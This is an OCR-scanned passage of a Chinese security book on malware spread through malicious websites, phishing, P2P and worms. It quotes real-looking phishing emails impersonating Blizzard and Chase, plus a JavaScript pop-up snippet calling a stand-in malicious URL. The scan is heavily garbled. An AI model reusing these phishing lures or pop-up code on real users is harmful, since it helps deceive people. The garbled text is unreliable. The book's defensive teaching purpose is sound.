向 ， 以 及 /或 者 链接 到 受 感染 的 网 站 。 这 对 你 来 说 意味 着 什么 ”你 的 用 户 每 天 在 互联 网 上 冲浪 ， 访 问 他 们 的 个 人 、 专 业 和 媒体 网 
站 ， 对 吗 ? 这 打开 了 你 的 企业 网 络 和 用 户 的 家 庭 网 络 ， 如 果 VPN 没 有 正确 配置 以 过 滤 未 授权 的 端口 和 协议 ， 这 种 威胁 就 会 传播 
到 企业 网 络 中 。 

在 用 户 从 “安全 ”的 内 部 网 络 之 外 进入 时 ， 正 确 配置 VPN 的 需求 是 个 严重 的 问题 。 大 量 的 恶意 内 容 ， 包 括 后 门 、Trojan- 
PSW、Trojan-Dropper、Trojan-Clicker 以 及 Trojan-Downloader 可 能 为 许多 可 以 远程 访问 到 的 恶意 软件 变种 打开 能 长 期 使 用 
的 门户 。 如 果 有 恶意 软件 爆发 而 你 处 于 危险 时 ， 强 烈 建议 以 Web 或 者 HTTP 过 滤 作 为 最 后 一 道 防线 。 


针对 性 的 恶意 网 站 “你 必须 知道 ， 黑 客 团体 并 不 像 大 部 分 世界 领导 人 所 认为 的 那样 是 一 群 乌 合 之 众 。 在 我 的 经 历 中 ， 我 已 经 
遇 到 一 些 黑客 ， 他 们 确实 识别 出 网 络 上 的 一 个 用 户 群 体 每 天 都 利用 和 访问 的 具体 网 站 ， 他 们 只 需要 把 精力 伦 在 入 侵 这 些 具体 的 网 
站 上 ， 就 能 确保 很 快 地 载 入 一 些 客户 端 利用 ; 然后 他 们 的 猎物 很 快 而 且 很 容易 地 遭 到 了 攻击 ,无 人 能 幸免 。 而 且 这 种 威胁 很 容易 


实现 ， 因 为 所 有 边界 网 络 安全 设备 将 不 会 因 这 种 恶意 用 户 的 访问 和 攻击 而 发 出 警告 


注意 : KAKA (Waterhole) 是 上 述 攻击 的 一 个 很 好 的 例子 ， 详 见 http://blogsdev.rsa.com/wp- 
content/uploads/VOHOWPFINALREADY-FOR-Publication-09242012_AC.pdf. 


yw 
恶意 网 站 攻击 





网 站 攻击 的 基础 是 客户 端 利用 ， 这 很 简单 。 你 的 计算 机 访问 一 个 网 站 并 且 下 载 网 站 代码 ， 然 后 在 本 地 运行 。 这 些 代 码 都 隐藏 
在 你 的 HTTP 会 话 封包 中 ， 一 般 可 以 用 多 种 方式 潜藏 和 混淆 ， 使 得 防火 墙 、NIDS 和 防 病毒 软件 不 能 及 时 发 现 。 客 户 端 利用 是 进入 
你 的 网 络 的 一 种 精致 、 简 捷 和 直接 的 方法 ， 只 有 在 几 天 、 几 周 有 时 候 甚至 是 几 个 月 后 当 你 发 现 企业 系统 的 表现 有 些 奇怪 时 ， 才 能 
够 发 现 它 。 几 乎 所 有 攻击 都 指向 你 的 互联 网 浏览 器 ， 不 管 你 用 的 是 哪 一 个 一 一 Firefox、Chrome、safari， 或 者 其 他 更 多 的 浏览 
器 ， 你 都 不 安全 。 


Ə 基于 恶意 网 站 的 恶意 软件 的 对 策 


培训 “用 户 必须 理解 互联 网 冲浪 可 能 将 恶意 软件 带 入 企业 。 现 在 ， 多 半 发 送 给 用 户 的 电子 邮件 链接 都 进行 客户 端 利用 ， 当 用 
户 单 击 这 些 链 接 时 就 会 在 主机 上 装 入 各 种 类 型 的 恶意 软件 。 首 先 应 该 通过 适当 的 措施 和 教育 来 避免 这 种 情况 。 


防 间谍 软件 模块 ” 随 着 Windows XP 的 发 行 ，Microsoft 引 入 了 它们 的 防 间谍 软件 工具 一 Microsoft Anti-Spyware， 这 个 
软件 在 2002 年 从 GIANT 软 件 公 司 取得 。 这 确实 是 个 好 工具 ， 它 对 经 过 检验 和 许可 的 Windows XP 用 户 是 “免费 ”的 。 后 
来 ，Microsoft 又 发 行 了 Windows Defender， 这 也 是 一 个 好 的 工具 。 但 是 ， 这 些 工具 的 安全 只 能 和 它们 保护 的 系统 一 样 好 ,一 
个 脆弱 的 系统 将 会 使 Windows Defender 无 能 为 力 ， 无 法 避免 操作 系统 的 进一步 感染 。 但 是 至 少 这 些 工具 能 够 提供 帮助 ， 我 们 
需要 所 有 能 够 取得 的 工具 。 

基于 Web 的 内 容 过 滤 ”一些 企 业 网 络 工具 (如 Web 或 URL 过 滤 ) 在 与 恶意 网 站 的 斗争 中 是 有 帮助 的 ， 但 是 它们 只 能 利用 IP 


黑 名 单 、 扫 摘 算 法 和 特征 码 来 发 现 攻击 和 恶意 软件 变种 。 每 种 基于 特征 码 的 系统 的 问题 都 在 于 要 具备 识别 恶意 活动 的 需要 的 所 有 
特征 码 ， 和 /或 足以 处 理 大 量 企业 级 通信 的 高 速度 。 


1.8.3 ”网 络 仿冒 


网 络 仿 冒 是 一 种 从 目标 实体 获得 信息 的 方法 ， 经 过 实验 证 明 行 之 有 效 ， 仍 然 吸引 着 任何 与 T 相 关 行 业 的 注意 力 。 你 的 用 户 在 
工作 中 或 者 在 家 里 收 到 一 封 看 起 来 合法 的 电子 邮件 ， 但 是 实际 上 这 是 一 个 精心 编造 的 假象 ,诱惑 用 户 单 击 一 个 链接 或 者 提供 足够 
详细 的 个 人 或 者 职业 信息 ， 这 些 信息 使 攻击 者 可 以 窃取 个 人 身份 ， 或 者 得 到 关于 所 在 公司 的 更 详细 信息 ， 以 便 得 到 对 私人 或 者 公 
共 信 息 资源 的 访问 权 ， 从 而 导致 更 大 的 破坏 或 者 得 到 利益 。 


精心 编造 的 仿冒 邮件 是 目标 组 织 和 与 之 对 抗 的 安全 行业 的 梦 麻 。 仿 冒 能 够 导致 直接 窃取 身份 或 者 带 有 恶意 代码 (客户 端 攻 
$) 的 URL， 这 在 前 面 内 容 中 已 经 提 到 过 。 


现在 我 猜 你 一 定 想 要 知道 ，“ 我 怎么 避免 用 户 受 到 仿冒 ? ”答案 是 : 培训 ! 培训 你 的 员工 识别 发 送 电子 邮件 的 人 ; 如 果 邮 件 
是 合法 且 有 嵌入 的 URL 或 者 附件 ， 让 这 位 员工 在 打开 邮件 之 前 致电 发 信人 进行 验证 。 大 部 分 国际 组 织 要 求 员工 这 么 做 ， 这 只 需 
一 点 时 间 ， 却 可 能 为 你 的 组 织 挽回 几 百 万 损失 。 


电子 邮件 恶意 软件 传播 也 称 为 鱼 叉 式 仿冒 ， 是 最 有 效 的 仿冒 方法 。 电 子 邮件 仿冒 的 概念 从 20 世 纪 90 年 代 中 期 就 开始 使 用 ， 
其 中 最 为 人 瞩目 的 是 在 美国 在 线 网 络 (America Online network) 中 的 运用 。 但 是 ， 鱼 叉 式 仿冒 在 过 去 几 年 中 已 经 作为 更 具 针 
对 性 的 仿冒 方法 而 再 次 兴起 。 


@ 网 络 仿冒 威胁 





在 对 付 网 络 仿冒 时 ， 有 两 种 主要 的 威胁 是 你 确实 应 该 注意 的 : 个 人 信息 的 丢失 ， 以 及 你 或 者 你 的 雇员 通过 仿冒 泄露 的 公司 信 
息 可 能 引起 的 更 大 的 破坏 。 还 有 第 三 种 威胁 ， 但 是 这 和 刚刚 介绍 的 恶意 网 站 相同 。 这 些 威胁 一 开始 似乎 没有 什 和 








骗 你 提交 信息 的 看 似 正 式 的 假象 一 一 但 是 ， 这 种 阴谋 造成 的 损失 总 是 大 于 填写 表单 所 花费 的 几 分 钟 时 间 。 


现在 想象 一 下 ， 你 只 花费 了 10 ~ 15 分 钟 来 填写 询问 你 的 信息 (身份 、 银 行 、 健 康 状况 、 职 业 、 公 司 等 ) 的 表单 ， 它 只 是 把 
你 引导 到 一 个 POST 提 交 死 链接 (在 标准 Web 表 单 上 的 最 后 一 个 提交 按钮 ) ， 现 在 所 有 信息 流出 到 网 络 空间 并 且 落 入 许多 组 织 的 
手 里 ， 这 些 组 织 的 目标 就 是 将 这 些 信息 用 于 各 种 目的 ， 这 些 目的 都 不 是 你 所 感 兴趣 的 。 有 时 候 在 恶意 网 站 上 单 击 按钮 就 等 于 批准 
计算 机 在 你 填写 表单 或 者 等 待 提交 过 程 结束 的 同时 在 后 台 装 入 恶意 软件 。 


@ 来 自 网 络 仿冒 的 攻击 





网 络 仿冒 攻击 有 两 种 主要 的 类 型 : 主动 和 被 动 。 


主动 仿冒 ”这 种 方法 是 基于 电子 邮件 的 ， 一 般 要 求 用 户 在 阅读 邮件 时 单 击 一 个 链接 ， 将 用 户 转 到 一 个 仿冒 得 很 逼真 的 主流 公 
司 网 站 。 一 般 你 会 发 现 主动 仿冒 方案 大 都 按照 大 公司 网 站 的 样子 建立 。 

注意 : 询问 为 你 个 人 或 者 公司 服务 的 银行 ， 了 解 它们 目前 是 否 公告 针对 其 成 员 的 仿冒 阴谋 。 你 还 可 以 联系 一 些 大 公司 ， 比 如 
eBay. Amazon, Apple, Yahoo, Focebook # % Microsoft. 

用 户 一 般 信任 这 些 网 站 ， 因 为 他 可 能 有 这 些 网 站 的 账户 或 者 软件 。 更 重要 的 是 ， 这 些 仿 冒 阴谋 将 会 要 求 账 户 信息 以 便 窃取 你 
的 身份 证 明 ， 然 后 将 这 些 账 户 用 于 他 们 的 绰 恶 目的 。 主 动 仿冒 还 可 以 在 免费 广告 中 看 到 ， 在 这 种 广告 中 ， 用 户 可 能 收 到 一 个 邮 
件 ， 声 称 如 果 他 们 填写 表单 并 且 提 交 信 息 ， 甚 至 可 能 提供 多 个 朋友 的 邮件 地 址 ， 将 会 收 到 网 站 所 提供 “免费 的 500 美 元 礼券 ”。 


下 面 是 主动 仿冒 阴谋 的 一 些 实例 。 


World of Warcraft - Account Information Change Instructions - Message (HTML) 


Message Developer 


This message was sent with High importance. 
From: WoWAccountAdmin @blizzaad.com Sent: Thu 4/9/2009 1:27 PM 
To: sbodmer Ge 
Cc 
Subject: World of Warcraft - Account Information Change Instructions 





This is a notification regarding the World of Warcraft account. As your account information has been known by the Third Party. We are now processing with the case of changing 
contact information of you as you requested. Please note that changing of contact information usually takes about 3-5 days to process. 


For the safety of your account, we still have a final confirmation of your account information. Please be sure to send us your account information by the following way: 


Account / Logging name : 
First & Last name : 
Security Question : 

Email Address : 


After you mailed the submission, please allow time for delivery. Only the Account Administration department can address disputes or questions you may have about the account 
recovery process. To learn more about how we are able to assist you, please visit us at httpv/us blizzard.com/supporvarti 1505. 


Sincerely, 

Account Administration 
Blizzard Entertainment 
www. WorldOfWarcraft.com 














被 动 仿冒 ”这 种 方法 一 般 是 绑 定 到 搜索 引擎 的 闲置 网 站 ， 慢 慢 地 等 待 着 用 户 的 信任 ， 然 后 用 户 被 一 个 虚假 的 数据 前 端 所 诱 
惑 ， 按 照 要 求 填写 申请 表 并 且 单 击 提交 按钮 。 单 击 按钮 之 后 ， 用 户 一 般 得 到 一 个 回 到 同一 页 面 的 借口 ， 最 终 因为 没有 结果 而 泪 痛 
地 离开 这 个 网 站 。 这 种 被 动 方法 可 能 有 两 种 结果 : 一 种 是 所 提供 的 信息 用 于 另 一 个 恶意 的 用 途 ， 另 一 种 是 该 网 站 在 用 户 单 击 提交 
按钮 时 确实 运行 了 恶意 软件 并 且 将 其 安装 到 用 户 的 计算 机 上 。 后 者 在 1.8.2 节 中 已 经 介绍 过 ， 但 是 这 仍然 是 恶意 软件 由 其 他 形式 
的 恶意 代码 进行 分 发 和 承载 的 另 一 种 方式 。 


下 面 是 被 动 仿冒 阴谋 的 一 些 实例 。 





s ation! - Message (Plain Text) =|D|x| 
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This message was converted to plain text. 


From: Chase [genmail.id00437 12-0041 190cb@chase.com] Thu 5/8/2008 3:14 PM 
oo e 
Ce: 


Subject: Chase Bank Customer Service: New Security Notification! 








Pear Chase bank customer, 


As part of our security measures, all Chase bank customers are required to complete Chase Online Form. 
We requested information from you for the following reason: your banking records are not updated. 


You should complete Chase Online Form on a regular basis. 
To access the form please click on the following link: 


Chase Online Form <http://chaseonline.chase.com.techldr.org.uk/ReidentifyFormOnine/OnlineForm.aspx?chase id= 
9175602335858142487167383856014137330937487754613975618031léuser id=92138682> 








We thank you for your prompt attention to this matter. Please understand that this is a security measure intended to help protect you and your account. 
We apologize for any inconvenience. 


Sincerely, 
Chase Online Accounts Department 
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Original Message 
From: tponchoS@mbharch.com [mailto:tponchoS@mbharch.com] 
Sent: Saturday, April 04, 2009 3:55 PM 
To: agingwell@comcast.net t 84 pace 
Subject: ISY5 recap ujc Lwmhceha 


Click to follow link 
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Ə 网 络 仿冒 的 对 策 


培训 用户 需 要 了 解 ， 在 互联 网 冲浪 可 能 把 恶意 软件 带 进 你 的 企业 。 现 在 ， 超 过 半数 的 发 送 给 用 户 的 电子 邮件 链接 都 会 把 他 
带 到 一 个 网 站 ， 要 求 他 输入 可 以 用 于 窃取 信息 的 个 人 或 者 公司 信息 。 这 可 以 通过 保持 警惕 和 教育 来 避免 。 


反 网 络 仿冒 模块 ” 随 着 Microsoft Internet Explorer7.0 的 发 行 ， 反 仿冒 模块 和 弹出 窗口 拦截 程序 作为 完全 集成 的 模块 引 
入 ， 为 你 的 系统 提供 进一步 的 保护 。 但 是 很 不 幸 ， 大 部 分 最 终 用 户 都 禁用 这 个 服务 ， 以 避免 影响 业务 运作 及 /或 办 公 时 间 内 的 个 
人 生活 质量 。 


认 知 活动 ”你 可 以 通过 雇佣 一 个 小 组 以 固定 的 方式 进行 仿冒 攻击 来 培训 员工 ， 从 而 训练 他 们 在 未 来 识别 潜在 的 仿冒 企图 。 
1.8.4 ”对 等 网 络 (P2P) 


对 等 网 络 技术 在 20 世 纪 90 年 代 未 开始 抬头 ， 最 初 它 对 于 大 部 分 最 终 用 户 来 说 是 天 赐 之 物 ， 后 来 一 些 狭 猎 的 人 或 者 集团 发 现 
他 们 可 以 在 一 个 P2P 文 件 中 发 布 恶 意 病 毒 ， 下 载 后 一 旦 执行 ， 他 们 就 控制 了 你 。2002 年 ， 在 坏 家 伙 们 再 次 开始 为 了 经 济 利益 而 
这 么 干 的 几 个 月 之 后 ， 高 等 法 院 裁 定 ， 媒 体 公司 在 具有 版 权 的 产品 中 携带 恶意 软件 ， 并 且 将 其 部 署 在 P2P 网 络 上 以 破坏 非法 下 载 
者 的 机 器 的 行为 是 非法 的 。 在 当时 这 是 令 人 印象 深刻 的 举动 。 


现在 ， 对 等 网 络 的 概念 已 经 远 远 超越 了 主要 用 于 分 散 信息 传播 以 及 Morpheus 式 的 文件 共享 网 络 的 原始 模型 。 现 在 恶意 软件 
实施 对 等 通信 ， 以 便 将 僵尸 网 络 和 蠕虫 传播 到 历史 上 从 未 有 人 预测 到 的 地 方 。 多 年 以 前 ， 安 全 专家 已 经 预测 到 恶意 软件 的 新 进展 
将 导致 全 球 性 的 传染 ， 我 们 现在 就 能 发 现 这 种 预言 已 经 成 为 现实 。 现 在 ， 对 等 网 络 恶意 软件 已 经 大 规模 地 部 署 恶 意 软件 而 不 用 担 
心 当局 发 现 和 提起 诉讼 的 最 新 和 最 热门 的 方法 。 实 施 一 个 对 等 恶意 软件 网 络 的 力量 在 于 它 天 生 具 备 长 期 生存 的 能 力 ， 不 需要 任何 
单独 的 指挥 控制 点 。 不 要 忘记 ，P2P 文 件 共享 网 络 也 是 隐藏 在 像 bittorrent、Kazaa 等 网 络 上 的 非法 传播 文件 中 的 恶意 软件 的 最 
大 所 有 者 。 这 种 极其 成 功 的 网 络 架构 已 经 为 实施 相似 的 指挥 控制 结构 铺 平 了 道路 。 


例如 ， 在 1000 台 主机 的 对 等 恶意 软件 网 络 中 ， 你 可 能 有 12 个 指挥 控制 (C2) 服务 器 。 现 在 这 些 指挥 控制 服务 器 中 ， 每 个 服 
务 器 都 控制 着 这 1000 个 主机 的 一 个 子 集 。 我 们 假设 每 个 指挥 控制 服务 器 接受 75 ~ 90 个 主机 的 报告 。 现 在 每 个 子 集 在 很 小 的 生存 
时 间 半 径 之 内 (TTL=3) 至 少 可 以 对 其 他 子 集 有 少许 了 解 (2 ~ 6 台 主 机 ) 。 如 果 在 同一 分 段 的 6 台 主 机 向 不 同 的 C2 服务 器 报告 ， 
每 个 服务 器 理论 上 应 该 有 子 集中 的 每 台 主 机 的 列表 ， 然 后 是 在 TTL 半 径 内 的 其 他 一 些 主 机 。 这 种 通信 方法 确保 所 有 C2 服务 器 知晓 
网 络 的 整体 情况 ， 而 不 需要 直接 访问 整个 网 络 ， 网 络 防御 者 也 就 不 会 直接 了 解 整个 网 络 的 情况 。 图 1-6 是 恶意 软件 对 等 网 络 的 C2 
结构 图 。 如 果 你 关注 主机 1 并 且 观 察 通信 路 径 ， 它 会 向 3 个 TTL 之 内 的 所 有 主机 发 送信 息 ， 穿 越 多 个 子 集 ， 每 个 更 新 都 会 被 传送 到 
各 自 的 C2 服 务 器 。 


ô 来 自 P2P 的 威胁 





我 将 把 P2P 威 胁 分 为 两 类 一 一 操作 型 和 法 律 型 ， 这 两 种 威胁 对 你 的 家 庭 和 企业 网 络 都 有 严重 的 影响 。 





搜索 半径 = TTL3 


图 1-6”P2P 常 见 结构 


操作 型 ”P2P 不 仅 在 你 的 网 络 上 打开 多 个 端口 ， 还 将 你 的 网 络 文件 和 信息 开放 给 世界 上 的 几 百 万 个 其 他 P2P 用 户 。 这 些 用 户 
中 有 些 是 无 害 的 ， 而 有 些 人 在 P2P 上 就 是 为 了 向 全 世界 散布 恶意 软件 。 对 于 后 者 ， 你 将 在 执行 恶意 软件 时 受到 感染 。 现 在 ， 在 你 
的 网 络 上 打开 的 应 用 程序 和 端口 就 像 是 “任何 人 ”进入 你 的 网 络 并 且 为 所 欲 为 的 门户 。 这 些 方 法 本 质 上 具备 了 一 个 被 感染 的 文件 


法 律 型 ”我 不 是 一 名 律师 ， 但 是 我 们 都 知道 在 过 去 的 10 年 ， 国 际 上 已 经 实施 了 保护 集团 公司 版 权 和 许可 的 法 律 。P2P 的 出 现 
使 世界 软件 和 媒体 市 场 损失 了 数 十 亿美 元 ， 并 且 对 整个 世界 的 市 场 造成 了 负面 的 影响 。 简 而 言 之 ， 如 果 你 的 用 户 或 者 家 庭 使 用 
P2P 网 络 在 你 的 企业 中 下 载 文件 ， 你 就 更 可 能 受到 侵害 ， 而 且 在 任何 时 候 都 可 能 被 许多 对 P2P 网 络 进行 清洗 的 法 人 识别 出 来 ， 根 
据 IP 地 址 所 在 地 的 法 律 规定 不 同 ， 可 能 对 这 种 侵权 行为 课 以 数 百 万 美元 的 重 罚 。 


@ 来 自 P2P 的 攻击 





对 操作 型 威胁 的 担心 主要 来 自 于 对 你 的 网 络 中 使 用 的 P2P 应 用 程序 的 控制 及 其 相关 P2P 文 件 的 执行 ， 这 是 你 需要 注意 的 重大 
问题 。 最 起 码 ， 如 果 用 户 能 够 安装 、 下 载 并 且 执 行 P2P 文 件 ， 你 的 主管 不 会 对 你 的 绩效 给 出 满意 的 评价 。 


Ə P2P 对 策 


培训 ”用户 必须 理解 ， 在 家 里 或 者 办 公 室 里 安装 P2P 应 用 程序 可 能 导致 严重 的 恶意 软件 感染 。 以 P2P 作 为 主干 来 传播 恶意 软 
件 从 20 世 纪 90 年 代 末 就 开始 了 ， 使 用 的 软件 包括 Morpheus、Kazaa、Gnutella 以 及 其 他 许多 很 容易 在 互联 网 上 下 载 的 工具 。 
P2P 应 用 程序 层出不穷 ， 现 在 可 以 下 载 的 程序 如 Transmission-qt、Vuze 和 Deluge 等 ， 攻 击 者 都 可 以 自由 使 用 。 必 须 让 用 户 明 
确 地 了 解 使 用 P2P 应 用 程序 在 法 律 和 技术 上 的 影响 ， 特 别 是 在 建立 用 于 连接 到 你 的 VPN 进 入 企业 的 PC 上 使 用 P2P。 每 个 人 都 喜 
欢 的 “自由 ”这 个 词 一 一 并 不 总 像 表面 上 那么 自由 。P2P 网 络 确实 有 合理 的 使 用 方法 ， 但 是 多 数 时 候 ， 黑 客 将 通过 在 自由 交换 的 
文件 中 嵌入 或 者 隐藏 恶意 软件 来 万 用 P2P 的 信任 机 制 ， 而 用 户 将 会 由 于 没有 完全 理解 从 这 些 网 络 中 进行 下 载 时 涉及 的 威胁 而 错误 
地 下 载 并 且 遭 到 感染 。 


公司 策略 ”公司 策略 在 保护 你 的 企业 中 也 非常 重要 。 了 解 公司 策略 漏洞 的 用 户 可 以 装 合 作 哑 ， 利 用 这 些 漏洞 牟取 私利 。 更 重 
要 的 是 ， 你 的 公司 策略 应 该 明确 指出 ， 如 果 雇 员 在 网 上 使 用 P2P 应 用 程序 被 发 现时 将 发 生 什 么 一 一 特别 是 ， 一 家 专业 的 公司 必须 
预想 到 ， 当 有 人 将 非法 和 可 能 是 恶意 的 文件 下 载 到 公司 的 系统 上 时 所 可 能 带 来 的 后 果 。 


个 人 经 历 : 对 等 网 络 


当 我 第 一 次 体验 P2P 网 络 的 有 害 之 处 时 ， 和 所 有 人 一 样 ， 也 是 在 20 世 纪 90 年 代 末 开始 从 Gnutella 和 Morpheus 这 些 地 方 下 载 媒 
体 。 我 很 快 听 说 了 一 种 最 快 和 最 容易 地 获得 远程 用 户 访问 权 的 方法 ， 也 就 是 把 恶意 文件 上 载 到 P2P 网 络 ， 然 后 只 要 等 待 轻信 的 用 


户 下 载 这 个 文件 〈 一 般 打 上 了 某 种 诱 人 的 标签 ) 并 且 执 行 。 这 种 方法 将 立即 使 某 个 人 能 够 远程 访问 你 的 系统 并 且 任 意 使 用 它 。 我 
承认 这 种 情况 曾经 两 次 发 生 在 我 身上 ; 我 只 是 为 自己 始终 在 家 庭 网 络 上 运行 超过 一 个 系统 而 感到 幸运 ， 在 这 种 时 候 就 可 以 很 容易 
使 用 tcpdump 监 控 到 。 这 只 是 我 的 个 人 和 职业 经 历 中 遇 到 的 许多 P2P 威 胁 实 例 之 一 。 但是， 我 在 前 面 也 已 经 提 到 过 其 他 几 个 在 实 
际 生 活 中 与 自己 相关 的 恶意 软件 实例 。 


1.8.5 “蠕虫 


在 1.6 节 中 ， 我 们 介绍 了 大 部 分 业界 范围 内 的 流行 恶意 软件 及 其 传播 技术 。 但 是 ， 我 们 没有 讨论 蠕虫 的 整体 策略 ， 以 及 它们 
除了 作为 传递 点 之 外 的 用 处 ; 我 们 没有 真正 地 从 企业 影响 的 角度 去 研究 蠕虫 所 能 做 的 一 切 。 蠕 虫 只 是 恶意 软件 编写 者 最 终 目标 的 
传播 层 。 在 第 2 章 ， 我 们 将 深入 讨论 恶意 软件 的 功能 性 ， 所 以 你 要 坐 下 来 继续 阅读 ， 这 样 可 以 更 好 地 理解 恶意 软件 在 你 的 系统 上 
时 的 功能 。 


@ 来 自 蠕 虫 的 威胁 





蠕 中 是 每 个 网 络 和 安全 管理 员 的 灾 星 。 前 面 讨论 的 StormWorm 是 目前 开发 出 来 的 最 危险 和 高 效 的 蠕虫。 它 利用 了 一 个 特 治 
伊 木 马 村 入 程序 ， 一 个 Rootkit 以 及 一 个 P2P 通 信 结 构 一 一 个 令 人 惊 谍 而 且 “ 几 乎 ”完美 的 网 络 风暴 (所 以 被 称 为 
StormWorm- 一 风暴 蠕虫 ) 。 来 自 蠕虫 以 及 它们 本 身 的 最 大 威胁 是 其 中 的 大 量 功能 ， 特 别 是 在 几 个 小 时 内 传记 互联 网 和 企业 网 
络 的 能 力 。 





Ə 来 自 蠕 虫 的 攻击 





一 般 ， 你 会 发 现在 一 个 蠕虫 中 实施 了 多 种 传播 技术 。 社 会 工程 导致 的 文件 执行 〈 基 于 客户 端 ) 注入 、 基 于 Web 的 感染 ( 基 
于 客户 端 ) 、 网 络 服务 利用 ， 以 及 基于 电子 邮件 的 传播 是 最 常用 的 方法 。 所 有 这 些 来 自 蠕虫 的 攻击 现在 执行 和 传播 得 如 此 之 快 ， 
以 至 于 你 必须 更 好 地 理解 蠕虫 本 身 用 于 进一步 传播 的 方法 。 蠕 虫 变种 越 新 ， 通 过 网 络 传播 的 方法 就 越 复 杂 多 变 。 虽 然 蠕 虫 问题 不 
像 以 前 那么 严重 了 ， 但 是 仍然 是 非常 令 人 头痛 的 。 


Ə 蠕虫 对 策 


强大 的 网 络 保护 “没有 一 种 供应 商 声称 能 提供 100% 保 护 你 的 系统 免 遭 蠕虫 侵害 的 工具 。 很 不 幸 ， 你 必须 采用 分 层次 的 方法 
并 且 使 用 多 种 工具 来 帮助 识别 蠕虫 ， 主 动 地 保护 你 的 网 络 资 源 。 一 般 ， 在 最 重要 的 网 络 出 入 点 需要 混合 型 的 IDS 或 者 IPS， 例 如 
情 确 以 及 部 分 的 指纹 匹配 系统 ， 来 作为 每 日 更 新 的 防 病毒 引擎 的 补充 。 


强大 的 主机 保护 ”有 多 种 可 用 的 HIDS 和 HIPS 工 具 ， 在 第 9 章 ， 我们 将 介绍 几 种 目前 发 现 和 避免 恶意 软件 通过 网 络 传播 的 最 
佳 工 具 。 


1.9 小 结 


总 的 来 说 ， 我 们 介绍 的 传播 技术 都 极其 难以 防御 ， 更 加 难以 用 传统 的 事后 剖析 方法 来 识别 。 我 们 所 讨论 的 这 些 技术 的 任意 组 
合 能 够 而 且 已 经 造成 了 令 世界 进入 暂时 性 混乱 的 全 球 性 流行 。 这 些 技术 加 以 适当 的 组 合 都 很 难 阻 止 。 当 今 仅 有 的 能 够 接近 于 识别 
这 些 传播 的 技术 是 基于 行为 的 入 侵 检测 系统 及 /或 实时 看 到 所 有 恶意 行为 的 honeynet 技 术 。 

正如 你 所 看 到 的 ， 现 在 的 恶意 软件 更 加 高 效 ， 更 有 计划 ， 这 不 可 避免 地 需要 金钱 的 支持 。 已 发 表 的 大 部 分 恶意 软件 都 由 具备 
和 防 病毒 软件 和 安全 公司 同样 的 资源 和 资金 的 机 构 来 组 织 和 开发 。 更 重要 的 是 ， 任 何 安全 研究 人 员 预 言 的 下 一 次 恶意 软件 高 峰 都 
会 在 18 个 月 内 到 来 ， 这 一 规律 从 未 被 打破 。 


第 2 章 ”恶意 软件 功能 


我 们 已 经 介绍 了 恶意 软件 如 何 传染 、 存 活 以 及 在 企业 中 传播 ， 接 下 来 将 要 讨论 第 1 章 中 介绍 的 各 种 恶意 软件 实例 的 功能 。 当 
今 的 恶意 软件 可 以 执行 许多 任务 ; 但 是 ， 它 的 核心 目的 是 赚 取 你 所 付出 的 金钱 以 及 窃取 保存 在 你 的 系统 上 的 宝贵 信息 。 我 们 将 在 
本 章 中 介绍 恶意 软件 侵入 你 的 计算 机 之 后 可 能 产生 的 一 些 危险 。 


2.1 ”有 恶意 软件 安装 后 会 做 什么 


恶意 软件 的 目标 取决 于 编写 和 购买 恶意 软件 的 人 以 及 软件 本 身 所 提供 的 功能 和 传递 的 内 容 。 现 在 让 我 们 深入 到 恶意 软件 功能 
及 其 用 于 从 你 的 网 络 窃取 信息 的 细节 之 中 。 


2.1.1 ”弹出 窗口 


弹出 式 广告 已 经 折磨 互联 网 用 户 数 十 年 了 。 它 们 最 初 是 简单 的 广告 ， 设 计 用 于 按照 点 击 数量 产生 收入 。 这 种 广告 形式 十 分 成 
功 ， 因 为 可 以 获得 收入 而 流行 起 来 。 恶 意 软 件 编写 者 发 现 了 这 一 点 ， 使 用 相同 的 概念 ， 用 弹出 式 窗口 感染 系统 。 精 心 设计 的 弹出 
式 窗口 可 以 哄骗 用 户 下 载 恶 意 软 件 。 然 后 ， 这 个 软件 会 生成 自己 的 弹出 式 广告 ， 为 其 所 有 者 产生 广告 点 击 收 入 ， 或 者 执行 其 他 任 
务 ， 如 从 受害 系统 上 窃取 信息 。 


注意 : 弹出 式 窗口 可 分 为 两 类 ， 下 面 将 讨论 作为 载荷 的 弹出 式 窗口 ， 以 及 作为 感染 方向 的 弹出 式 窗口 。 
弹出 式 窗口 的 威胁 促使 浏览 器 制造 商 创 造 了 弹出 式 窗口 拦截 程序 ， 它 们 以 插件 或 者 扩展 、 默 认 局 用 的 内 建功 能 形式 出 现 。 


弹出 式 窗口 拦截 程序 的 兴起 迫使 恶意 软件 编写 者 提出 了 对 策 。 除 了 URL 重 定向 ， 最 直接 的 方法 之 一 是 由 插件 程序 (例如 Java 
或 者 Flash) 直接 通过 弹出 窗口 注入 用 户 的 计算 机 。 下 面 是 一 个 非常 简单 的 Javascript 脚 本 ， 可 避 开 传统 的 弹出 窗口 拦截 程序 。 


<HEAD> 

<SCRIPT LANGUAGE="JavaScript"> 

<!-- Begin 

function popUp(URL) { 

day = new Date(); 

id = day.getTime(); 

eval ("page" + id + " = window.open(URL, '" + id + "', 
'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0, 
width=200, 

height=300,left = 740,top = 375');"); 

} 

// End --> 

</script> 

<form> 

<input type=button value="Open the Popup Window" onClick="javascript: 
popup ('http://mailicious.url.net/expl0Oltu')"> 

</form> 


最 初 ， 这 种 方法 被 证 明 很 有 效 ， 但 是 浏览 器 制造 商 识破 了 这 种 伎俩 。 它 们 开始 拦截 从 网 页 中 载 入 的 基于 插件 代码 生成 的 弹出 
窗口 。 这 就 催生 了 网 站 脚本 拦截 。 该 功能 对 于 用 户 日 常 使 用 很 不 方便 ， 因 为 必须 专门 允许 网 站 上 的 脚本 ， 使 其 能 够 运行 。 但 是 这 
是 保证 安全 、 避 免 弹出 式 恶意 软件 的 必要 妥协 。 


@ 弹出 窗口 威胁 





来 自 弹 出 窗口 的 威胁 由 “ 单 击 ” 因 素 决定 ; 连 我 母亲 都 上 过 当 。 一 些 弹 出 窗口 使 用 精心 制作 的 消息 ， 向 用 户 施 展 社会 工程 ， 
使 用 户 单 击 或 者 将 鼠标 移 到 窗口 的 任何 部 分 ， 这 会 启动 许多 操作 。 一 些 更 加 狗 独 的 弹出 窗口 甚至 在 用 户 单 击 右上 角 的 “x” 以 关 
闭 窗口 时 启动 程序 。 下 面 是 一 个 你 可 能 会 遇 到 的 弹出 式 广 告 实例 。 
aag 
WARNING: R 


We have detected that your PC is infected with Spyware! Spyware typically 
records your internet activities like email passwords, instant messenger, 
online banking transactions, chat rooms, dating sites/adult sites and any 
other sites you visit. Once installed on your PC - Spyware transmits your 
personal information to 3rd parties - without your permission. 


